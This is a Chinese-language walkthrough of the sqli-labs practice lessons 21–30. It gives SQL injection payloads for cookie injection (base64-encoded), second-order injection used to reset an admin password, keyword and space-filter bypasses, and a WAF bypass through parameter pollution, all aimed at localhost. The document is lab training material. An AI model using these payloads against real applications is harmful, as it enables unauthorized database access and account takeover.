Less-21 Cookie Injection- Error Based- complex – string
利用username=admin&password=admin登录成功
返回一个cookie,base64解码得admin,说明返回的cookie是登录的用户名经过base64编码所得,利用用户名,经测试为语句为(‘ ‘)闭合,构造payload如下:
admin') order by 1 #
base64编码为
YWRtaW4nKSBvcmRlciBieSAxICM=
给页面传cookie参数吗,这里通过hackbar(火狐插件)操作
查询到4时报错,说明列数为3,联合查询:
admin') and 1=2 union select 1,2,3#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLDIsMyM=
得注入点:1,2,3
爆库名和表(后面less皆注入到此步骤)
admin') and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSksZGF0YWJhc2UoKSx2ZXJzaW9uKCkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw==
Less-22 Cookie Injection- Error Based- Double Quotes – string
相对于Less-21,将语句的闭合变为双引号,其他同理,修改payload如下:
admin" and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSxkYXRhYmFzZSgpLHZlcnNpb24oKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj
爆库名和表
Less-23 Error Based- no comments
测试单引号,报错
尝试其他字符#(%23)
不难发现#被后台替换成空字符了(两个单引号之间没有空隙)
再试试– 单行注释
报错只把limit前面的单引号报出来,说明前面的单引号匹配了,猜测–被替换成空字符
查看源码,果然如此:
那只能闭合语句,构造payload:
http://localhost/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'
Less-24 – Second Degree Injections
一个二次注入,先审计下文件
login.php(过滤账户和密码)
login_create.php()
pass_change.php
可以发现更改密码时,sql语句用的是SESSION设置的值,那么只要用户名带有注释符便可注释掉后面的语句,无视密码限制
例如用户名为admin’ — (–后面带空格)的账户(‘在注册时会被转义成\’,但是在数据库时还是显示’)
创建特殊用户admin’ –,此处密码随便设,设了1234
进入数据库,查看创建成功
修改密码
在数据库中查看,发现admin的密码被成功修改了
Less-25 Trick with OR & AND
传参or和and,从提示处可以发现被过滤了
复写绕过
也可以通过对应的数学符号绕过(&&需经过url编码)
构造payload
http://localhost/sqli-labs-master/Less-25/?id=1' anandd 1=2 union select 1,database(),group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --%20
Less-25a Trick with OR & AND Blind
相对于25,将报错关闭
通过在id号前面加or或者and来测试是否被过滤,其余与less-25并无异处
Less-26 Trick with comments
看下源码,过滤了很多
由于多行注释被过滤,不能用来代替空格,用%a0代替
构造payload:
http://localhost/sqli-labs-master/Less-26/?id=1'%a0anandd%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()),database()'
Less-26a Trick with comments Blind
相对于less-26,关闭报错,同理测试过滤,其他相同
确认过滤了#
http://localhost/sqli-labs-master/Less-26a/?id=%231
确认过滤了or
http://localhost/sqli-labs-master/Less-26a/?id=or1
确认过滤多行注释符
http://localhost/sqli-labs-master/Less-26a/?id=/*1
确认过滤了单行注释
http://localhost/sqli-labs-master/Less-26/?id=--1
确认过滤了斜杠
http://localhost/sqli-labs-master/Less-26/?id=/1
确认过滤了反斜杠
http://localhost/sqli-labs/Less-26/?id=1\
确认过滤了空格,通过报错判断
http://localhost/sqli-labs/Less-26/?id=1' ' '
Less-27 Trick with SELECT & UNION
容易知道为单引号型注入,且空格被过滤了
查看源码
不严格的过滤,大小写绕过
http://localhost/sqli-labs-master/Less-27/?id=1'%a0and%a01=2%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()'
Less-27a Trick with SELECT & UNION Blind
双引号型注入,原理相同
payload:
http://localhost/sqli-labs-master/Less-27a/?id=1"%a0and%a0(length(database())>8)%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()"
Less-28 Trick with SELECT & UNION
观察源码
union和select开启了i模式匹配,且中间用\s过滤空格,不过用%a0依旧可以绕过,此处sql语句用(”)闭合
payload:
http://localhost/sqli-labs-master/Less-28/?id=1')%a0and%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()
Less-28a Trick with SELECT & UNION Blind
同上面的盲注原理,构造payload:
http://localhost/sqli-labs-master/Less-28a/?id=1')%a0and%a0(length(database())>8)%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()
Less-29 Protection with WAF
配置tomcat环境,输入单引号,报错并跳转页面
https://blog.csdn.net/nzjdsds/article/details/77758824
根据这篇文章,可以利用第二个值绕过waf
payload:
http://localhost:8080/sqli-labs-master/Less-29/?id=8&id=8' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'
Less-30 WAF PROTECT
与less-29原理一样,只不过变成了””闭合
payload:
http://localhost:8080/sqli-labs-master/Less-30/?id=8&id=8" and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()"